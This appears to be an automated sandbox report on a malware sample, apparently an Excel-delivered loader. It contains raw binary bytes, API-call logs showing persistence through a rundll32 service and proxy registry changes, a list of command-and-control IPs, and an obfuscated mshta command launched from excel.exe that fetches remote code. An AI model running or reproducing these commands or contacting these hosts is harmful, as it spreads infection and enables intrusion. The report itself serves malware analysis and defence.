Data received -ÿv(…Ày%ÿÿë‹MðÁƒÀPÿuøÿV ƒÄ ‰…ÀtƒEüƒÇ‹Eü‹…ÀuÊëƒeôƒ}ôt3jƒÃSÿ`b…À„;ÿÿÿë0j~ÿXbƒeôë"ÿv(ÿuøÿV$YYjëåÿv(ÿuøÿV$YYjÿXb‹Eô[_ÉÃÿt$ÿLbÃÿt$ÿt$ÿTbÃÿt$ÿtbÃU‹ìƒì,SV‹u¸MZ3Ûf9thÁÿXb3Àé-‹F<øPèûÿÿ…ÀtçW‹~<þ?PEuj¸Lf9Gu_öG8uY·W·GD8…Òv$H ‰Uü‹q‹…öuG8ëÆ;Ãv‹ØƒÁ(ÿMüuâEÔPÿ€b‹E؋WPHÿtÿ÷эDÿ#ñ#Á;ðthÁëT‹Pbjh0Vÿw4ÿӉEü…Àujh0VPÿӉEü…Àt&j4jÿdbPÿpb‹ð…öuh€PÿuüÿhbjÿXbé$‹Eü‰F·Gƒf(Áè ƒà‰FÇFrÇF }ÇF$Œ‹E؉F0ÿwTèúÿÿ…À„ÝjhÿwTÿuüÿӋOT…Év‹]‹Ð+؉MøŠ ˆ BÿMøuõ‹M‹Q<V‹UüW‰Q‰P4èÑùÿÿ…À„’‹‹@4+G4t P‹Æè`üÿÿ‰FëÇFè×üÿÿ…ÀtkVè=ûÿÿ…Àta‹‹^À‹…Àt‹| …ÿtë jjSÿЃÇ‹…Àuð‹‹@(…ÀtE‹MüÁƒ~t5ÿ54›ÿ50›ÿ5,›ÿЅÀuhZÿXbèÜ3ÀëÇFë ‰F,ëƒf,‹Æ_^[ÉÂU‹ìQ‹P‹E‹S‹XVW¹è·‰Uü…Ût0ƒxt*‹ñÁîf…öu‹p·É;Îr+Îëm‹p ‹x$ƒeòú…ÛwjÿXb3À_^[É‹Uü¹è·‹Ù‹ʲD:u C¶A„Òuó¶ Š:ËÒ÷Ú:ÙÉ÷Ù+ÑtÿE‹MƒÆGG;Hr¾ë«·‹Uü;Hw ‹@ˆ‹ÂëS3Û9^t‹‹F‹I(SSPÈÿÑ9^t,W3ÿ9^ ~‹F¸9t ÿv(ÿ0ÿV$YYG;~ |æÿvèv÷ÿÿY_‹F;Ãt h€SPÿhbVSÿdbPÿlb[Ãì(ƒd$SUVWh³-èù‹øp‹q‹=ôpY‹ q‹ó+ò¯ñ‰D$ lþ¯ï‹ÁkÀ‰D$(4+îkíl$ j^+ð‹Æ‹5üp¯ÆʼnD$‹î¯î¯ï‹Ã¯ï+Á¯Ç¯Â+ÃÁ¯ÂƒÅƒd$¯ë‹ù¯ù+ÅÆø‹D$<kÿ+|$ø‰|$$‹|$‹D$Njè‹Ç‹|$$ˆ/ƒà?ÿD$|$³-Š€°p‹ýˆrЋþkÿÇD$)|$‹ù¯û¯ú‹Ã¯úkÀ‰D$$ƒÀ¯ÆƒÇkÿ+ø¯=ôpjX+Ư, +ŋl$kÀD$<¯ëÇèŠÃöëôp³Âöë*ÃöéˆD$ŠÂö-øpöë*Ê\$öêØ ôpˆ\$³öë(D$¡ôp3ۋù¯øC+ߋ=øp+߯Ú+ÙkÛ‰l$0‹l$<݉\$4ƒd$X¯Þ3íE+ë‹\$(+êƒÃkí¯ß‹|$¯ùë¯è|$<‹øpkÛýߋø¯úG¯þ¯ø‰\$j[+ً߯þ¯ú+ߋ|$ +Ø\$$‹ékÛߋúkÿ‰\$(‹øpƒï¯þ|$<Û+ÙkÛߋ=øp‰\$$X¯ß+ëƒí¯îj^+ð¯ðA¯Ç‹|$,î+è‹D$<+é‹L$ê4h½³-‹D$(¾‹D$¶×Â3ҋý÷÷‹D$$Š‹ú
Data sent GET /sec/sec.png HTTP/1.1 Host: 92.255.57.195 Connection: Keep-Alive
Data sent GET /cszc/rPJJUvdOz/ HTTP/1.1 Host: kastamonulezzetrehberi.com Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
process rundll32.exe
host 104.131.62.48
host 142.4.219.173
host 168.197.250.14
host 185.148.168.220
host 191.252.103.16
host 217.182.143.207
host 37.44.244.177
host 45.138.98.34
host 51.210.242.234
host 54.38.242.185
host 62.171.178.147
host 66.42.57.149
host 69.16.218.101
host 92.255.57.195
service_name rppwmjzogbohxeb.iio service_path C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hppksos\rppwmjzogbohxeb.iio",kvxhUsPEpUw
Time & API Arguments Status Return Repeated

CreateServiceW

 service_start_name:
start_type: 2
password:
display_name: rppwmjzogbohxeb.iio
filepath: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hppksos\rppwmjzogbohxeb.iio",kvxhUsPEpUw
service_name: rppwmjzogbohxeb.iio
filepath_r: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hppksos\rppwmjzogbohxeb.iio",kvxhUsPEpUw
desired_access: 2
service_handle: 0x002b4598
error_control: 0
service_type: 16
service_manager_handle: 0x002a2eb8
1 2835864 0
Time & API Arguments Status Return Repeated

RegSetValueExA

 key_handle: 0x000002c4
regkey_r: ProxyEnable
reg_type: 4 (REG_DWORD)
value: 0
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
1 0 0
parent_process excel.exe martian_process cmd /c m^sh^t^a h^tt^p^:/^/0x5cff39c3/sec/sec.html
Time & API Arguments Status Return Repeated

RegSetValueExA

 key_handle: 0x000002c4
regkey_r: ProxyOverride
reg_type: 1 (REG_SZ)
value: 127.0.0.1:16107;
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride
1 0 0
process mshta.exe useragent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MARKANYEPS#25118)
process rundll32.exe useragent
Time & API Arguments Status Return Repeated

send

 buffer: GET /sec/sec.png HTTP/1.1 Host: 92.255.57.195 Connection: Keep-Alive
socket: 1400
sent: 74
1 74 0

send

 buffer: GET /cszc/rPJJUvdOz/ HTTP/1.1 Host: kastamonulezzetrehberi.com Connection: Keep-Alive
socket: 1424
sent: 91
1 91 0
parent_process excel.exe martian_process cmd /c m^sh^t^a h^tt^p^:/^/0x5cff39c3/sec/sec.html
parent_process powershell.exe martian_process "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
file C:\Windows\SysWOW64\Hppksos\rppwmjzogbohxeb.iio:Zone.Identifier
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
file C:\Users\Public\Documents\ssd.dll
file C:\Windows\System32\cmd.exe
dead_host 62.171.178.147:8080
dead_host 37.44.244.177:8080
dead_host 104.131.62.48:8080
dead_host 54.38.242.185:443
dead_host 192.168.56.102:49190
dead_host 45.138.98.34:80
dead_host 192.168.56.102:49191
dead_host 185.148.168.220:8080
dead_host 192.168.56.102:49183
dead_host 192.168.56.102:49189
dead_host 217.182.143.207:443
dead_host 191.252.103.16:80
dead_host 51.210.242.234:8080
dead_host 192.168.56.102:49192